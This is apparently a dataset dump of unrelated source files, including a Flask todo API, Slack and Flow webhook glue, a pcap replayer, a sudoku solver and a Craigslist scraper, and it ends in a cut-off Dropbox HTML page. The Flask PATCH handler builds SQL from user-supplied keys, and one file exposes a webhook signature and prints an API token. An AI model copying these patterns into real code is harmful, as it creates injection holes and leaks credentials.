index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
19,700 | f9f9ea100e56b446f9defdc6cd504b7ee33e108b | import sqlite3
import json
import os
import yaml
import sqlite3
from flask import Flask, g, request
from flask_restful import reqparse, abort, Api, Resource
app = Flask(__name__)
app.secret_key = os.urandom(24)
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect('data/app.db')
db.row_factory = sqlite3.Row
return db
def db_query(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
def db_execute(query: object, args: object = ()) -> object:
cur = get_db().execute(query, args)
get_db().commit()
lastid = cur.lastrowid
cur.close()
return lastid
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
# Setup Restful API Support
api = Api(app)
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
response.headers.add('Access-Control-Allow-Methods', 'GET,PATCH,PUT,POST,DELETE')
return response
parser = reqparse.RequestParser()
parser.add_argument('task')
parser.add_argument('id')
parser.add_argument('method')
# Todo
# shows a single todo item and lets you delete a todo item
class Task(Resource):
def get(self, id):
args = parser.parse_args()
message = "record returned successfully"
status = 200
success = True
row = db_query('SELECT * FROM todo WHERE id = ?', (id), one=True)
if row is None:
payload = []
message = 'no matching record found'
status = 404
success = False
else:
payload = [dict(row)]
response = {
'success': success,
'status': status,
'message': message,
'payload': payload
}
return response
def delete(self, id):
query = 'DELETE FROM todo WHERE id = ?'
id = db_execute(query, (id,))
message = 'task removed successfully'
response = {
'success': True,
'status': 200,
'message': message,
'payload': []
}
return response, 201
def patch(self, id):
body = request.get_json()
title = body['title']
description = body['description']
active = body['active']
complete = body['complete']
valuestrings = []
for key, value in body.items():
if key != 'id':
valuestrings.append('{0} = ?'.format(key))
query = 'UPDATE todo SET {0} WHERE id = ?'.format(", ".join(valuestrings))
rowid = db_execute(query, (title, description, active, complete, id))
row = db_query('SELECT * FROM todo WHERE id = ?', [id], one=True)
message = 'task updated successfully'
response = {
'success': True,
'status': 200,
'message': ", ".join(valuestrings),
'payload': [dict(row)]
}
return response, 201
# TodoList
# shows a list of all todos, and lets you POST to add new tasks
class TaskList(Resource):
def get(self):
todos = []
rows = db_query('SELECT * FROM todo')
for row in rows:
todos.append(dict(row))
message = "{} records returned successfully".format(len(todos))
response = {
'success': True,
'status': 200,
'message': message,
'payload': {'tasks': todos}
}
return response
def post(self):
body = request.get_json()
task = body['task']
query = 'INSERT INTO todo (title, description, complete) VALUES (?, ?, ?)'
id = db_execute(query, (task['title'], task['description'], task['complete']))
row = db_query('SELECT * FROM todo WHERE id = ?', [id], one=True)
message = 'task created successfully'
response = {
'success': True,
'status': 200,
'message': message,
'payload': [dict(row)]
}
return response, 201
##
## Actually setup the Api resource routing here
##
api.add_resource(TaskList, '/tasks')
api.add_resource(Task, '/tasks/<id>')
@app.route('/')
def home():
return "Please use a valid route", 404
if __name__ == '__main__':
app.run(
debug=True,
host='0.0.0.0'
) |
19,701 | 6b8ee730c02cc837eaae91312ee8697bc6357cf7 |
from lookahead_agent import LookaheadAgent
import random
class OneStepLookaheadAgent(LookaheadAgent):
def __init__(self, config):
super().__init__(config)
def name(self):
return "One step lookahead"
# Calculates score if agent drops piece in selected column
def score_move(self, grid, col):
next_grid = self.drop_piece(grid, col, self.piece)
return self.get_heuristic(next_grid, self.piece)
|
19,702 | e19a497273074d984da976050de02c7b492f7d5d | import argparse
import math
import time
from keras.models import model_from_json
import json
import numpy as np
import time
#Location Of JSON file
json_file = open('bot.json', 'r')
#json_file = open('pkmkb(70).json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
# Write the file name of the weights
#loaded_model.load_weights("pkmkb(70)_weights.h5")
loaded_model.load_weights("model-250-0.798153-0.802632.h5")
loaded_model._make_predict_function()
print("Loaded model from disk")
from pythonosc import dispatcher
from pythonosc import osc_server
'''
TP9, AF7, AF8, TP10'''
def eeg_handler(unused_addr, args, ch1, ch2, ch3, ch4,ch5):
#print("ch1",ch1,'\n')
print('yes')
y=[ch1,ch2,ch3,ch4]
y=np.array(y,'float64')
y=y.reshape(1,4,1)
print("@@@@@@@@@@")
prediction = loaded_model.predict(y)
print("********")
#print(prediction)
aa=prediction[0]
k=aa.max()
#print("k ", k)
qq=list(aa)
#print('qq ', qq)
f=qq.index(k)
#print('f ', f)
if f==0:
print("Forward")
# client.publish(mqtt_topic1,"F")
elif f==1:
print("Backward")
# client.publish(mqtt_topic1,"B")
elif f==2:
print("Left")
# client.publish(mqtt_topic1,"L")
elif f==3:
print("Right")
# client.publish(mqtt_topic1,"R")'''
ip = "192.168.0.124"
port = 5005
dispatcher = dispatcher.Dispatcher()
dispatcher.map("/muse/eeg", eeg_handler, "EEG")
server = osc_server.ThreadingOSCUDPServer(
(ip, port), dispatcher)
# print("Serving on {}".format(server.server_address))
server.serve_forever()
|
19,703 | d495655ea5ad9c8cce2bbbfa648ef4b156cd21d0 | from django.http.response import JsonResponse as JSR
from django.http.response import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.conf import settings
import requests
import json
from portal.models import notify_devs
MS_FLOW_URL="https://prod-54.westus.logic.azure.com:443/workflows/306a0803a4ee49fc939bb1a1a7467829/triggers/manual/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=LPDDdoYWwIkmlKVdgu_0PPOa5cMPHFzm8GOOyqqiSn8"
@csrf_exempt
def dispatch(request):
body = request.POST
notify_devs("info", "body is: {}\nrequest.POST is: {}".format(body, request.POST))
room = body["room"]
room_notify(room=room)
return HttpResponse(content=None)
@csrf_exempt
def respond(request):
body = request.POST
notify_devs("primary", body)
if 'challenge' in body:
challenge_val = body['challenge']
notify_devs('warning', 'body is: {} and challenge is: {}'.format(str(body), challenge_val))
return HttpResponse(content=json.dumps({'challenge':challenge_val}), content_type='application/json')
elif 'payload' in body:
payload = json.loads(body['payload'])
# channel = payload["channel"]["id"]
response_url = payload["response_url"]
responding_user_id = payload["user"]["id"]
responding_user = payload["user"]
reaction = payload["actions"][0]["value"]
reaction_results = reaction.split("|")
room = reaction_results[0]
status = reaction_results[1]
notify_devs("success", "reaction received from {}: {}".format(responding_user, reaction_results))
# send reaction to slack
r1 = requests.post(response_url, data=json.dumps({"replace_original":"true","text":"<@{}> marked {} as {}.".format(
responding_user_id, room, status)}),headers={"Content-type":"application/json"})
# send update to MS Flow to update spreadsheet.
ms_flow_data = {"room":room, "result":status, "userid":responding_user}
r2 = requests.post(MS_FLOW_URL, data=json.dumps(ms_flow_data), headers={"Content-type": "application/json"})
# update message in Slack with MS Flow response
r3 = requests.post(response_url, data=json.dumps({"ephemeral": "true", "text": "{}".format(r2.status_code)}),
headers={"Content-type": "application/json"})
notify_devs("danger","process finished\n{}-{}\n{}-{}".format(r2.status_code, r2.text, r3.status_code, r3.text))
return HttpResponse(content=None)
def send_to_slack(content, channel="GBWTZANG6", url="https://slack.com/api/chat.postMessage"):
payload = json.dumps({"channel": channel, "blocks": content})
headers = {"Content-type":"application/json", "Authorization": "Bearer {}".format(settings.SLACK_API_TOKEN)}
print(settings.SLACK_API_TOKEN)
return requests.post(url, data=payload, headers=headers)
def room_notify(room="Acacia-101", channel="GBWTZANG6"):
blocks = [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "{} is empty and ready for inspection.".format(room)
}
},
{
"type": "actions",
"elements": [
{
"type": "button",
"text": {
"type": "plain_text",
"emoji": True,
"text": ":white_check_mark: Good to go!"
},
"style": "primary",
"value": "{}|good".format(room)
},
{
"type": "button",
"text": {
"type": "plain_text",
"emoji": True,
"text": ":x: Has a problem!"
},
"style": "danger",
"value": "{}|bad".format(room)
}
]
}
]
send_to_slack(blocks, channel)
def respond_to_slack_interaction(request):
try:
body = json.loads(request.body)
except TypeError:
body = json.loads(str((request.body.decode('utf-8'))))
|
19,704 | 699d590e901173e0e2a6ab20c7b793337969a010 | class Employee:
companay="google"
salary=100
harry=Employee()
rajni=Employee()
harry.salary=300
rajni.salary=400
print(harry.companay)
print(rajni.companay)
Employee.companay="YouTube"
print(harry.companay)
print(rajni.companay)
print(harry.salary)
print(rajni.salary)
|
19,705 | 7b8066ee223be671af43fef682bac32ba199dd1e | #!/usr/bin/env python3
# coding: utf-8
import argparse
parser = argparse.ArgumentParser(description='freq autochord prediction.')
parser.add_argument('--ntest', metavar='N', type=int, default=2000,
help='test set size')
parser.add_argument('state_filename', metavar='freq_perfect.state', type=str, default="freq_perfect.state",
help='input state filename')
parser.add_argument('--batch', type=bool, default=False,
help='batch mode')
args = parser.parse_args()
print(args)
import torch
import model
state = torch.load(args.state_filename)
net = model.Net(state['nsample'], state['nclass_out'])
net.load_state_dict(state['net_state_dict'])
freqs = state['freqs']
nclass_out = state['nclass_out']
nsample = state['nsample']
import data
import numpy as np
corr = []
for index, freq in enumerate(freqs):
print("#", index, freq, end=' ')
accum = torch.zeros(nclass_out)
for kk in range(args.ntest):
tensor = torch.from_numpy(data.serie(nsample, freq)).type(torch.float).unsqueeze(0).unsqueeze(1)
prediction = net(tensor)
#print(tensor.shape, prediction.shape, prediction.min())
#print(prediction.shape)
confidence, index_ = prediction.max(1)
#print(confidence.item(), index_.item())
accum[index_] += 1
accum = 100*accum/args.ntest
corr.append(accum)
print(accum)
corr = torch.stack(corr).type(torch.int).numpy()
perfect = np.all(corr == 100 * np.eye(corr.shape[0], corr.shape[1], dtype=int))
print(corr, corr.shape)
print("PERFECT !!!!!!" if perfect else ":(")
|
19,706 | 820bb7bcbc0fb10bc2407995de291e5795fc27b7 | import sys
sys.stdin = open('input.txt', 'r')
def DFS(i, count):
global anw
if count == len(zeroidx):
for tt in arr:
print(*tt)
anw = True
return
# while i <= len(zeroidx):
temp = zeroidx[i]
nowy = temp[0]
nowx = temp[1]
candidate = getNum(nowy, nowx)
visited2 = [False for _ in range(len(candidate))]
if not candidate:
return
for candi in range(len(candidate)):
arr[nowy][nowx] = candidate[candi]
visited2[candi] = True
DFS(i+1, count+1)
arr[nowy][nowx] = 0
visited2[candi] = False
if anw:
break
def getNum(nowy, nowx):
visited = [False for _ in range(10)]
#가로 세로
for y in range(9):
for x in range(9):
if arr[nowy][x]:
visited[arr[nowy][x]] = True
if arr[y][nowx]:
visited[arr[y][nowx]] = True
#어느 박스에 속했는지 찾기
boxy = boxx = 0
for y in [3,6,9]:
if nowy<y: boxy = y-3 ; break
for x in [3,6,9]:
if nowx<x: boxx = x-3 ; break
for j in range(3):
for i in range(3):
if arr[boxy+j][boxx+i]:
visited[arr[boxy+j][boxx+i]] = True
candidate = []
for tt in range(1,10):
if not visited[tt]:
candidate.append(tt)
return candidate
arr = [list(map(int, input().split())) for _ in range(9)]
zeroidx = []
anw = False
for y in range(9):
for x in range(9):
if arr[y][x]==0:
zeroidx.append([y,x])
DFS(0,0)
|
19,707 | 826bd61d1947076c78e9dcaf7eed51afbd2f1a28 | import json
from flask import Flask
import weather
# print(" >>> ", sys.path)
app = Flask(__name__)
# Prima ruta care o ia din radacina din cauza la /
@app.route("/")
def hello():
return "Hello, World!"
# A 2-a ruta care este verificate pe site doar cu /weather/ dupa ip
@app.route("/weather-cluj/")
def weather_route():
temp = json.dumps(weather.weather())
return temp
# A 3-a ruta
@app.route("/weather/my-cities/")
def weather_multiple_citites():
return"Cluj:15, New York: 10"
|
19,708 | 3d27b5b26eded65dda6c72a33302339111f098d1 | #!/usr/bin/env python
import argparse
import pcapfile.savefile
import socket
import time
def _packet_ts(packet):
return packet.timestamp + 1e-6 * packet.timestamp_ms
def main(argv):
ap = argparse.ArgumentParser()
ap.add_argument('pcap', nargs='+', help="Path to pcap file(s)")
ap.add_argument('--itf', default='eth0', help="Interface to replay on.")
ap.add_argument('--Kt', type=float, default=1.0,
help="Time factor (higher is faster).")
args = ap.parse_args(argv)
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
for pcap_path in args.pcap:
with open(pcap_path, 'r') as pcap_file:
print "Loading %s..." % pcap_path
pcap = pcapfile.savefile.load_savefile(pcap_file)
n = len(pcap.packets)
t = _packet_ts(pcap.packets[-1]) - _packet_ts(pcap.packets[0])
print "Replaying %d packets during %f seconds..." % (n, t)
t0_pcap = _packet_ts(pcap.packets[0])
t0_sys = time.time()
for packet in pcap.packets:
t_send_pcap = _packet_ts(packet)
t_send_pcap_rel = t_send_pcap - t0_pcap
t_send_sys_rel = t_send_pcap_rel / args.Kt
t_send_sys = t_send_sys_rel + t0_sys
while True:
delay = t_send_sys - time.time()
if delay <= 0:
break
time.sleep(delay)
sock.sendto(packet.raw(), (args.itf, 0, 0))
if __name__ == '__main__':
import sys
main(sys.argv[1:])
|
19,709 | e20ba90f234f0d922f7808fe4478bc13b5b31d7b | # bitwise opeators on images
import cv2
import numpy as np
from matplotlib import pyplot as plt
img1=np.zeros((250,500,3),np.uint8)#y,x
img1=cv2.rectangle(img1,(200,0),(300,100),(255,255,255),-1)#x,y
img2=np.zeros((250,500,3),np.uint8)
img2=cv2.rectangle(img2,(250,0),(500,250),(255,255,255),-1)
bitAnd=cv2.bitwise_and(img2,img1)
bitOr=cv2.bitwise_or(img2,img1)
bitXor=cv2.bitwise_xor(img2,img1)
bitNot=cv2.bitwise_not(img2)
images=[img1,img2,bitAnd,bitOr,bitXor,bitNot]
titles=['img1','img2','bitAnd','bitOr','birXor','bitNot']
for i in range(6):
plt.subplot(2,4,i+1),plt.imshow(images[i],'gray')
plt.title(titles[i])
plt.xticks([]),plt.yticks([])
# cv2.imshow('img1',img1)
# cv2.imshow('img2',img2)
# cv2.imshow('bitAnd',bitAnd)
# cv2.imshow('bitor',bitOr)
# cv2.imshow('bitXor',bitXor)
# cv2.imshow('bitNot',bitNot)
plt.show()
# cv2.waitKey(0)
# cv2.destroyAllWindows()
|
19,710 | 4acb2d0eff471f7bb5479ce5df80b50fbb335fc6 | # -*- coding: utf-8 -*-
"""
Created on Fri May 14 11:25:20 2021
@author: malth
"""
import AMCParsermaster.amc_parser_pytorch as amc
import torch
import os
os.environ["KMP_DUPLICATE_LIB_OK"] = "TRUE"
import glob
import pickle
from priors import noRoot_gauss, noRoot_NF, zeroPrior
from invKin import invKin
# hyperparametre
sigma = 1
K = 7
NF_training_nitts = 1
invKin_nitts = 1
learning_rate = 0.1
saveRootPath = "experiment2/run5"
drawImages = False
flowtype = "MAF"
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def Experiment_2(prior, inputPose, goal_pos, endPose, joints, jointType, saveRootPath, movementType, priorType, indeks):
"""
:param prior: the prior used (object)
:param inputPose: the input pose taken from test data (dict)
:param target_positions: the position of the end effector in Cartesian coordinates (list of 3x1 tensors)
:param endPose: the end pose taken from test data (dict)
:param joints: list of joints objects (list)
:param jointType: the end effector being used (as list with just one strings)
:param saveRootPath: the root path where pickles are saved (as string)
:param movementType: The activity used (as string)
:param priorType: the type of prior used (as string)
:param indeks: the index of test file for which the end pose was taken (as int)
:return: None
: saves the input pose from data, the generated pose and the end pose from data
"""
print("-----------------Initial pose------------------------")
print("jointType = ", jointType)
if drawImages:
joints["root"].set_motion(inputPose)
joints["root"].draw()
saveMotion(inputPose, os.path.join(saveRootPath, "startpose"),
movementType + "_" + str(jointType[0]) + "_" + str(indeks) + ".pkl")
outputPose = invKin(prior, inputPose, goal_pos, jointType, joints, lr=learning_rate, sigma=sigma,
nitts=invKin_nitts, verbose=False)
print("----------------Optimized pose -----------------------")
print("jointType = ", jointType)
if drawImages:
joints["root"].set_motion(outputPose)
joints["root"].draw()
saveMotion(outputPose, os.path.join(saveRootPath, priorType),
movementType + "_" + str(jointType[0]) + "_" + str(indeks) + ".pkl")
print("----------------End pose (from data) -----------------------")
print("jointType = ", jointType)
if drawImages:
joints["root"].set_motion(endPose)
joints["root"].draw()
saveMotion(endPose, os.path.join(saveRootPath, "rigtig"),
movementType + "_" + str(jointType[0]) + "_" + str(indeks) + ".pkl")
def copyDict(dicct):
"""
:param dicct: dicct of joint angles
:return: A cloned version of dicct
"""
dicct_ny = {}
for key in dicct:
dicct_ny[key] = dicct[key].detach().clone()
return dicct_ny
def getPose(test_amc_path, indeks):
"""
:param test_amc_path: path to test amc file (as string)
:param indeks: index for which a poses is wished retreived (as int)
:return: The pose of test_amc file relating to that index
"""
motions = amc.parse_amc(test_amc_path)
motions[indeks]['root'][:3] = torch.tensor([0.0, 0.0, 0.0], device=device)
start_pose = copyDict(motions[indeks])
for key in start_pose:
if key != "root":
start_pose[key].requires_grad = True
start_pose[key] = start_pose[key].to(device)
return start_pose
def getGoalposes(test_amc_path, test_asf_path, jointType, indekser):
"""
:param test_amc_path: path to test amc file
:param test_asf_path: path to test asf file
:param jointType: the end effector (as list of strings)
:param indekser: indices (list of ints)
:return: Retreiving the end effector target position of the test_amc_path relating to
specified indices, relating to the specified end effectors. The returned data type
is list in list. Has to be index as goal_pos_list[jointType][index]. Also returns the
endPose
"""
joints = amc.parse_asf(test_asf_path)
motions = amc.parse_amc(test_amc_path)
for motion in motions:
motion['root'][:3] = torch.tensor([0.0, 0.0, 0.0], device=device)
goal_pos_list = []
goal_pos_temp = []
print("Creating goal positions:")
for joint in jointType:
for indeks in indekser:
goal_pos = amc.angle2pos(motions[indeks], joints, joint).detach()
goal_pos_temp.append(goal_pos)
goal_pos_list.append(goal_pos_temp)
goal_pos_temp = []
endPoses = [motions[indeks] for indeks in indekser]
return goal_pos_list, endPoses
def saveMotion(motion, path, fileName):
"""
:param motion: A joint angle dictionary
:param path: A path (wihtout filename)
:param fileName: The filename
:return:
"""
motionClone = {}
for key in motion:
tensorclone = motion[key].clone()
motionClone[key] = tensorclone.detach().cpu()
if os.path.isdir(path):
pass
else:
print("direc no exist. Creating it ...")
os.makedirs(path)
with open(os.path.join(path, fileName), "wb") as f:
pickle.dump(motionClone, f)
def getPrior(priorType, train_path):
"""
:param priorType: The type of prior (as string)
:param train_path: The train_paths (list of training files)
:return: A trained prior object
"""
frameslist = amc.getFrameslist(train_path)
if priorType == "NF":
prior = noRoot_NF(frameslist, flowtype=flowtype, K=K,
nitts=NF_training_nitts)
elif priorType == "Gauss":
prior = noRoot_gauss(frameslist)
elif priorType == "zero":
prior = zeroPrior()
else:
raise NotImplementedError("this prior type no exist")
del frameslist
return prior
def changePathstyle(paths):
"""
:param paths: List of paths with \\'s
:return: list of paths with only /'s
"""
changedPaths = []
for path in paths:
changedPath = path.replace("\\", "/")
changedPaths.append(changedPath)
return changedPaths
if __name__ == "__main__":
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
priorTypes = ["NF", "Gauss", "zero"]
indekser = {"walking": {"rhand": [(5, 25), (45, 65)], "lfoot": [(25, 45), (75, 95)]},
"running": {"rhand": [(5, 25), (45, 65)], "lfoot": [(35, 55), (55, 75)]},
"boxing": {"rhand": [(50, 70), (125, 145)], "lfoot": [(90, 110), (280, 300)]}
}
jointTyper = ["rhand", "lfoot"]
bevægelser = ["walking", "running", "boxing"]
dataPaths = {"walking": (glob.glob('../data/Walking/*.amc'), "../data/Walking/16_30.amc",
'../data/Walking/35.asf'),
"running": (glob.glob('../data/Running/*.amc'), "../data/Running/16_49.amc",
'../data/Running/16.asf'),
"boxing": (glob.glob('../data/Boxing/*.amc'), "../data/Boxing/13_18.amc",
'../data/Boxing/14.asf')}
for bevægelse in bevægelser:
dataPaths_train, dataPath_test, asf_path = dataPaths[bevægelse]
dataPaths_train = changePathstyle(dataPaths_train)
dataPaths_train.remove(dataPath_test)
joints = amc.parse_asf(asf_path)
for priorType in priorTypes:
prior = getPrior(priorType, dataPaths_train)
for jointType in jointTyper:
for startIndeks, slutIndeks in indekser[bevægelse][jointType]:
startpose = getPose(dataPath_test, startIndeks)
goal_poses, endPoses = getGoalposes(dataPath_test, asf_path, [jointType], [slutIndeks])
Experiment_2(prior, startpose, goal_poses[0], endPoses[0], joints,
[jointType], saveRootPath, bevægelse, priorType, slutIndeks)
|
19,711 | a0f2b0517fdb02f4077d3dde275ead9dfb3dba75 | #python project
#mehraan kiya
#roshanamooz
import tkinter as tk
from docx2pdf import convert
import tkinter.ttk as ttk
from tkinter.filedialog import askopenfile
from tkinter.messagebox import showinfo
#librarys for needs
win = tk.Tk()
#title for program name or programmer
win.title("word to pdf converter coded by m3hr44n")
def openFile():
file = askopenfile(filetypes =[('word files', '*.docx')])
convert(file.name,r'C:\Users\Desktop\converted.pdf')
showinfo("Done","file successfully converted")
#function for open file
label = tk.Label(win,text="Choose file => : ")
label.grid(row=1,columns=1,padx=5,pady=5)
#label grid for size screen program
button = ttk.Button(win,text= "Select",width=30,command=openFile)
button.grid(row=2,column=1,padx=5,pady=5)
win.mainloop()
|
19,712 | 1f0357f78fec40080870dcbef46438b94de7c5bb | '''
Created on 15.12.2016
@author: sapejura
'''
import socket
# from xevacam import utils
import requests
def init(addr):
print('INIT')
r = requests.post(addr + "/init", timeout=5)
print(r.status_code, r.reason)
print(r.text)
resp = r.json()
if resp['status'] != 'STOPPED':
print('status is not STOPPED, it\'s %s' % resp['status'])
return
def start(addr):
print('START')
r = requests.post(addr + "/start", timeout=5)
print(r.status_code, r.reason)
print(r.text)
if r.status_code is 200 and r.reason == 'OK':
return r.json()
else:
return None
def receive_data(addr_tuple):
print('CONNECTING TO SOCKET %s:%s' % tuple(addr_tuple))
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(tuple(addr_tuple))
cs = client_socket.makefile(mode='rb')
print('CONNECTED')
try:
# Make a file-like object out of the connection
# connection = client_socket.makefile('rb')
# input('Enter')
i = 0
while True:
# data = connection.read(163840)
# data = client_socket.recv(1024)
data = cs.read(163840)
if data != b'':
# print(data)
print('Got', len(data), 'bytes frame data,', i)
# print('Got', len(data), 'bytes frame data,', i)
i += 1
else:
print('No frame data')
# print(connection.read(163840))
# a = input('asdasd>')
# if a != '':
# break
except:
raise
finally:
print('Closing connection...')
# connection.close()
client_socket.close()
print('...closed.')
def main():
print('Starting')
addr = "http://127.0.0.1:5000"
init(addr)
input('Enter')
resp = start(addr)
socket_addr = resp['stream_address']
if socket_addr is None:
print('Received data didn\'t have socket address')
return
receive_data(socket_addr)
if __name__ == '__main__':
main()
|
19,713 | 95bb8c9785770152029b6ced3e6a59220d81540a | from django.conf.urls import url, patterns
from .views import MessageCreateView, MessageListView
urlpatterns = patterns(
'',
url(r'^add/$', MessageCreateView.as_view(), name='add'),
url(r'^$', MessageListView.as_view(), name='list'),
)
|
19,714 | 0b162d8470f9fa385808d0da66326631b8f240ff | from bs4 import BeautifulSoup
import datetime
import calendar
from time import strptime
import requests
import csv
import re
import time
import random
from pathlib import Path
links = []
date = datetime.datetime.today().strftime('%m-%d')
day = int(date.replace('-','')[2:])
mtn = int(date.replace('-','')[:2])
if day > 7:
window = day - 7
elif day <= 7:
get_end = 31 - day
if mtn not in [2,4,9,11]:
if day != 1:
window = [range(1,day), range(get_end,32)]
else:
window = [day, range(get_end,32)]
if mtn not in [1,2,3,5,7,8,10,12]:
if day != 1:
window = [range(1,day), range(get_end,31)]
else:
window = [day, range(get_end,31)]
if mtn == 2:
if day != 1:
[range(1,day), range(get_end,29)]
else:
window = [day, range(get_end,29)]
def get_duplex(url):
status = ''
headers = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.8',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'
}
with requests.Session() as s:
get_data = s.get(url, headers=headers)
soup = BeautifulSoup(get_data.content, 'lxml')
for title in soup.find_all('p', class_='result-info'):
get_date = title.find('time', class_='result-date')
check_day = int((get_date.text)[4:])
if check_day < window:
status = 'done'
break
check_mtn = (get_date.text)[:3]
get_num_mtn = calendar.month_abbr[mtn]
if check_day > window and get_num_mtn == check_mtn:
get_link = title.find('a', class_='result-title')
title = get_link.text
data = [get_link.get('href'),title, get_date.text]
links.append(data)
print('made it')
if status == 'done':
return status
def cycle(url):
multi = 140
get_duplex(url)
while multi < 2900:
time.sleep(random.randint(2,9))
t0 = time.time()
end_url = '?s={0}'.format(multi)
combo = url + end_url
if get_duplex(combo) == 'done':
break
response_delay = time.time()- t0
time.sleep(response_delay+23)
print('NEEEEXT!')
multi = multi + 140
def write_info(url, place):
get_area = re.search(r"\/\/\w+", url)
city = (get_area.group())[2:]
cycle(url)
csv_file = open('louisville{0}.csv'.format(place), 'w')
csv_writer = csv.writer(csv_file)
csv_writer.writerow(['City', 'URL', 'Title', 'DatePosted', 'Price', 'Email', 'Phone'])
for link in links:
csv_writer.writerow([city, link[0], link[1], link[2]])
#print(time.time())
#write_info('https://louisville.craigslist.org/search/roo', 'Roo')
#print(time.time())
#time.sleep(150)
my_file = Path("louisvilleApa.csv")
print(time.time())
done = False
while done == False:
if my_file.is_file():
done=True
print(time.time())
else:
try:
write_info('https://louisville.craigslist.org/search/apa', 'Apa')
except:
continue
|
19,715 | fc670db732df8170e27c331e14a25e55e32864df | <!DOCTYPE html><html lang="en" xmlns:fb="http://ogp.me/ns/fb#" xml:lang="en" class="" xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascript">
window._document_observe_listeners = [];
document.observe = function(event, func) {
window._document_observe_listeners.push({event: event, func: func});
};
window._jquery_ready_handlers = [];
jQuery = function(handler) {
window._jquery_ready_handlers.push(handler);
};
function on_script_loaded(func) {
(window.LoadedJsSuccessfully && document.loaded) ? func() : document.observe('script:loaded', func);
}
</script> <link href="https://dt8kf6553cww8.cloudfront.net/static/images/favicon-vflk5FiAC.ico" rel="shortcut icon" /><link href="https://dt8kf6553cww8.cloudfront.net/static/css/main-vflrsqIdX.css" type="text/css" rel="stylesheet" /><link href="https://dt8kf6553cww8.cloudfront.net/static/css/web_sprites-vflTkIkhK.css" type="text/css" rel="stylesheet" /><link href="https://dt8kf6553cww8.cloudfront.net/static/images/dropbox_webclip-vflO8tEZ4.png" rel="apple-touch-icon" /><link href="/w3c/p3p.xml" rel="P3Pv1" /><script type="text/javascript">window.ST=+new Date();</script><meta content="text/html; charset=UTF-8" http-equiv="content-type" /><meta content="Dropbox is a free service that lets you bring your photos, docs, and videos anywhere and share them easily. Never email yourself a file again!" name="description" /><meta content="online storage, free storage, file sharing, share files,
awesome, cloud storage, online backup, cross platform, sync, sharing, mac,
windows, os x, linux, backup, collaboration, file versioning, file revisions,
remote access, undelete" name="keywords" /><meta content="IE=EDGE" http-equiv="X-UA-Compatible" /><meta content="noindex" name="robots" /><meta content="RaspberryPiUptime.py" property="og:title" /><meta content="Shared with Dropbox" property="og:description" /><meta content="https://www.dropbox.com/static/images/icons128/page_white_code.png" property="og:image" /><meta content="https://www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" property="og:url" /><meta content="website" property="og:type" /><meta content="Dropbox" property="og:site_name" /><meta content="210019893730" property="fb:app_id" /><meta content="summary" name="twitter:card" /><meta content="@Dropbox" name="twitter:site" /><meta content="https://www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" name="twitter:url" /><meta content="RaspberryPiUptime.py" name="twitter:title" /><meta content="Shared with Dropbox" name="twitter:description" /><meta content="https://www.dropbox.com/static/images/icons128/page_white_code.png" name="twitter:image" /><meta content="TnuSyOnBMNmtugbpL1ZvW2PbSF9LKvoTzrvOGS9h-b0" name="google-site-verification" /><meta content="EZKIczQcM1-DVUMz8heu1dIhNtxNbLqbaA9-HbOnCQ4" name="google-site-verification" /><meta content="tz8iotmk-pkhui406y41y5bfmfxdwmaa4a-yc0hm6r0fga7s6j0j27qmgqkmc7oovihzghbzhbdjk-uiyrz438nxsjdbj3fggwgl8oq2nf4ko8gi7j4z7t78kegbidl4" name="norton-safeweb-site-verification" /><meta content="https://dt8kf6553cww8.cloudfront.net/static/images/win8_web_tile-vfl8eyKFU.png" name="msapplication-TileImage" /><meta content="#ffffff" name="msapplication-TileColor" /><title>Dropbox - RaspberryPiUptime.py</title><script type="text/javascript">var Constants = {"protocol": "https", "SUBSCRIBE_URL": "/subscribe", "_viewer_properties": {"_user_data": []}, "NOTIFICATION_TYPE_META": -1, "DISABLE_VIDEOS_IN_LIGHTBOX": false, "DOC_PREVIEW_IN_PROGRESS": 2, "team_id": "", "BATCH_THUMB_ENDPOINTS": ["//photos-1.dropbox.com/btjb", "//photos-2.dropbox.com/btjb", "//photos-3.dropbox.com/btjb", "//photos-4.dropbox.com/btjb", "//photos-5.dropbox.com/btjb", "//photos-6.dropbox.com/btjb"], "GSLB_ENABLED": 0, "REQUEST_ID": "fdcd53d9d49b069cc67a61d1d43e8bcd", "static_url_video_js_swf": "https://dt8kf6553cww8.cloudfront.net/static/swf/video-js-vflMfTkZb.swf", "BLOCK_CLUSTER": "dl-web.dropbox.com", "DELETE_ON_UNLINK_SUPPORTED": 1, "personal_email": "", "MAX_EXCEL_FILE_SIZE_B": "104857600", "DISABLE_VIDEO_ICONS": false, "static_url_pdfjs_viewer": "/static/javascript/external/pdf-js/viewer.html", "TWO_ITEM_LIST": "%(x)s and %(y)s", "static_url_copy_clipboard_swf": "https://dt8kf6553cww8.cloudfront.net/static/swf/copy_clipboard-vflvMcZTC.swf", "LIVE_TRANSCODE_SERVER": "showbox-tr.dropbox.com", "DELETE_ON_UNLINK_UNSUPPORTED": 3, "ADMIN": 0, "IS_PROD": 1, "cached_contacts_enabled": 0, 